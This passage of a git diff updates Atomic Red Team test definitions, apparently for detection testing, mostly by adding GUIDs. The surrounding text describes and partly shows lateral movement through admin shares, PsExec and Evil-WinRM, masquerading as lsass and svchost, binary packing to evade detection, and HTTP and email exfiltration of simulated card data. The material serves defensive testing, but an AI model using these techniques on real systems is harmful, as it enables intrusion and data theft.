is used, other exfiltration techniques likely apply
## Atomic Test #1 - IcedID Botnet HTTP PUT + +auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 + Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file | Exfiltration File | String | C:\temp\T1020_exfilFile.txt| | domain | Destination Domain | url | https://google.com| diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md index d9bb0d80..93c50921 100644 --- a/atomics/T1021.001/T1021.001.md +++ b/atomics/T1021.001/T1021.001.md @@ -16,15 +16,17 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
## Atomic Test #1 - RDP to DomainController -Attempt an RDP session via Remote Desktop Application to a DomainController. +auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e + +Attempt an RDP session via Remote Desktop Application to a DomainController. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")| | domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN| @@ -56,7 +58,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID } ##### Description: Computer must be domain joined ##### Check Prereq Commands: ```powershell -if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} +if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -70,15 +72,17 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - RDP to Server -Attempt an RDP session via Remote Desktop Application over Powershell +auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b + +Attempt an RDP session via Remote Desktop Application over Powershell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | logonserver | ComputerName | String | WIN-DC| | username | Username | String | Administrator| diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md index 001dd7b8..f772ec3d 100644 --- a/atomics/T1021.002/T1021.002.md +++ b/atomics/T1021.002/T1021.002.md @@ -20,15 +20,17 @@ Windows systems have hidden network shares that are accessible only to administr
## Atomic Test #1 - Map admin share -Connecting To Remote Shares +auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 + +Connecting To Remote Shares **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | String | DOMAIN\Administrator| | share_name | Examples C$, IPC$, Admin$ | String | C$| @@ -52,15 +54,17 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
## Atomic Test #2 - Map Admin Share PowerShell -Map Admin share utilizing PowerShell +auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 + +Map Admin share utilizing PowerShell **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Examples C$, IPC$, Admin$ | String | C$| | map_name | Mapped Drive Letter | String | g| @@ -83,15 +87,17 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
## Atomic Test #3 - Copy and Execute File with PsExec -Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). +auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf + +Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe| | remote_host | Remote computer to receive the copy and execute the file | String | \\localhost| @@ -112,7 +118,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} +if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -129,16 +135,18 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
## Atomic Test #4 - Execute command writing output to local Admin Share + +auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46 + Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Remote computer to receive the copy and execute the file | String | output.txt| | command_to_execute | Command to execute for output. | String | hostname| diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index 2ddef964..d197e64c 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -16,6 +16,9 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
## Atomic Test #1 - PowerShell Lateral Movement using MMC20 + +auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + Powershell lateral movement using the mmc20 application com object. Reference: @@ -23,14 +26,13 @@ Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, cmd will spawn calc.exe on a remote computer. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of Computer | string | localhost| diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index 9dca5875..a5fb4f0d 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md @@ -16,10 +16,12 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
## Atomic Test #1 - Enable Windows Remote Management + +auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf + Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. - **Supported Platforms:** Windows @@ -42,17 +44,19 @@ Enable-PSRemoting -Force
## Atomic Test #2 - Invoke-Command + +auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 + Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | host_name | Remote Windows Host Name | String | localhost| | remote_command | Command to execute on remote Host | String | ipconfig| @@ -74,15 +78,17 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
## Atomic Test #3 - WinRM Access with Evil-WinRM -An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled +auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d + +An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | Username | string | Domain\Administrator| | destination_address | Remote Host IP or Hostname | string | Target| @@ -103,7 +109,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password} ##### Description: Computer must have Ruby Installed ##### Check Prereq Commands: ```powershell -if (ruby -v) {exit 0} else {exit 1} +if (ruby -v) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -114,7 +120,7 @@ Start-Process $file1 /S; ##### Description: Computer must have Evil-WinRM installed ##### Check Prereq Commands: ```powershell -if (evil-winrm -h) {exit 0} else {exit 1} +if (evil-winrm -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md index f7e9f706..d7874fa0 100644 --- a/atomics/T1027.001/T1027.001.md +++ b/atomics/T1027.001/T1027.001.md @@ -12,17 +12,19 @@ Binary padding effectively changes the checksum of the file and can also be used
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd + +auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a + Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary| @@ -45,7 +47,7 @@ rm #{file_to_pad} ##### Description: The binary must exist on disk at specified location (#{file_to_pad}) ##### Check Prereq Commands: ```bash -if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; +if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md index 4a353029..0bc19e12 100644 --- a/atomics/T1027.002/T1027.002.md +++ b/atomics/T1027.002/T1027.002.md @@ -18,16 +18,18 @@ Utilities used to perform software packing are called packers. Example packers a
## Atomic Test #1 - Binary simply packed by UPX (linux) + +auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4 + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx| @@ -52,18 +54,20 @@ rm /tmp/packed_bin
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux) + +auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed| @@ -88,16 +92,18 @@ rm /tmp/packed_bin
## Atomic Test #3 - Binary simply packed by UPX + +auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx| @@ -122,18 +128,20 @@ rm /tmp/packed_bin
## Atomic Test #4 - Binary packed by UPX, with modified headers + +auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d + Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed| diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md index c5d39e0b..4b1a7bcc 100644 --- a/atomics/T1027.004/T1027.004.md +++ b/atomics/T1027.004/T1027.004.md @@ -14,16 +14,18 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
## Atomic Test #1 - Compile After Delivery using csc.exe + +auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206 + Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output compiled binary | Path | C:\Windows\Temp\T1027.004.exe| | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| @@ -47,7 +49,7 @@ del #{output_file} >nul 2>&1 ##### Description: C# file must exist on disk at specified location (#{input_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_file}) {exit 0} else {exit 1} +if (Test-Path #{input_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -62,18 +64,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Dynamic C# Compile + +auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef + When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe| @@ -92,7 +96,7 @@ Invoke-Expression #{input_file} ##### Description: exe file must exist on disk at specified location (#{input_file}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_file}) {exit 0} else {exit 1} +if (Test-Path #{input_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 9f34ff74..152fface 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -26,10 +26,12 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
## Atomic Test #1 - Decode base64 Data into Script + +auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb + Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. - **Supported Platforms:** macOS, Linux @@ -55,17 +57,19 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell + +auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6 + Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| @@ -90,17 +94,19 @@ powershell.exe -EncodedCommand $EncodedCommand
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry + +auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec + Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion| | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"| @@ -133,15 +139,17 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
## Atomic Test #4 - Execution from Compressed File -Mimic execution of compressed executable. When successfully executed, calculator.exe will open. +auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f + +Mimic execution of compressed executable. When successfully executed, calculator.exe will open. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip| @@ -166,7 +174,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul ##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe ##### Check Prereq Commands: ```powershell -if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} +if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -182,16 +190,18 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email + +auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad + Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm| | sender | sender email | string | test@corp.com| @@ -215,16 +225,18 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP + +auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 + Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm| | ip_address | Destination IP address | string | 127.0.0.1| diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index db1e43f3..1e1ace1e 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Data Transfer Size Limits -Take a file/directory, split it into 5Mb chunks +auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a + +Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | File name | Path | T1030_urandom| | folder_path | Path where the test creates artifacts | Path | /tmp/T1030| @@ -43,7 +45,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; ##### Description: The file must exist for the test to run. ##### Check Prereq Commands: ```sh -if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; +if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 60000e3a..a6b8c381 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -16,18 +16,20 @@ Utilities and commands that acquire this information include whoami
## Atomic Test #1 - System Owner/User Discovery + +auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa + Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of remote computer | string | localhost| @@ -55,10 +57,12 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
## Atomic Test #2 - System Owner/User Discovery + +auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c + Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. - **Supported Platforms:** Linux, macOS @@ -83,8 +87,10 @@ who
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView) -Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. +auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca + +Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 53f7811f..9087162b 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -26,10 +26,12 @@
## Atomic Test #1 - Masquerading as Windows LSASS process + +auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717 + Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session - **Supported Platforms:** Windows @@ -57,10 +59,12 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
## Atomic Test #2 - Masquerading as Linux crond process. + +auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 + Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. - **Supported Platforms:** Linux @@ -88,10 +92,12 @@ rm /tmp/crond
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe + +auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 + Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. - **Supported Platforms:** Windows @@ -119,10 +125,12 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe + +auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 + Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder - **Supported Platforms:** Windows @@ -150,10 +158,12 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe + +auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa + Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. - **Supported Platforms:** Windows @@ -181,17 +191,19 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe + +auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 + Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| | inputfile | path of file to copy | path | PathToAtomicsFolder\T1036.003\bin\T1036.003.exe| @@ -217,7 +229,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{inputfile}) {exit 0} else {exit 1} +if (Test-Path #{inputfile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -232,15 +244,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Masquerading - windows exe running as different windows exe -Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe +auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 + +Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| | inputfile | path of file to copy | path | $env:ComSpec| @@ -268,11 +282,13 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
## Atomic Test #8 - Malicious process Masquerading as LSM.exe + +auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f + Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path. - **Supported Platforms:** Windows @@ -301,17 +317,19 @@ del C:\lsm.exe >nul 2>&1
## Atomic Test #9 - File Extension Masquerading + +auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc + download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe| | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs| diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md index e6448421..7c1348a8 100644 --- a/atomics/T1036.004/T1036.004.md +++ b/atomics/T1036.004/T1036.004.md @@ -14,8 +14,10 @@ Tasks or services contain other fields, such as a description, that adversaries
## Atomic Test #1 - Creating W32Time similar named service using schtasks -Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" +auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 + +Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao" **Supported Platforms:** Windows @@ -43,8 +45,10 @@ schtasks /tn win32times /delete /f
## Atomic Test #2 - Creating W32Time similar named service using sc -Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" +auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66 + +Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao" **Supported Platforms:** Windows diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index 458839a1..aab962e3 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -12,15 +12,17 @@ Adversaries may also use the same icon of the file they are trying to mimic. ## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. -Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) +auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 + +Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1| diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md index e8191189..72ccf8b3 100644 --- a/atomics/T1036.006/T1036.006.md +++ b/atomics/T1036.006/T1036.006.md @@ -14,8 +14,10 @@ Adversaries can use this feature to trick users into double clicking benign-look
## Atomic Test #1 - Space After Filename -Space After Filename +auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f + +Space After Filename **Supported Platforms:** macOS diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index b426a16f..e1e4f50b 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -12,8 +12,10 @@ Renaming abusable system utilities to evade security monitoring is also a form o
## Atomic Test #1 - System File Copied to Unusual Location -It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. +auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd + +It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. **Supported Platforms:** Windows diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md index c1163486..500ffdb3 100644 --- a/atomics/T1037.001/T1037.001.md +++ b/atomics/T1037.001/T1037.001.md @@ -12,16 +12,18 @@ Adversaries may use these scripts to maintain persistence on a single system. De
## Atomic Test #1 - Logon Scripts + +auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_path | Path to .bat file | String | %temp%\art.bat| | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt| diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md index b5745668..c642506b 100644 --- a/atomics/T1037.002/T1037.002.md +++ b/atomics/T1037.002/T1037.002.md @@ -12,8 +12,10 @@ Adversaries may use these login hooks to maintain persistence on a single system
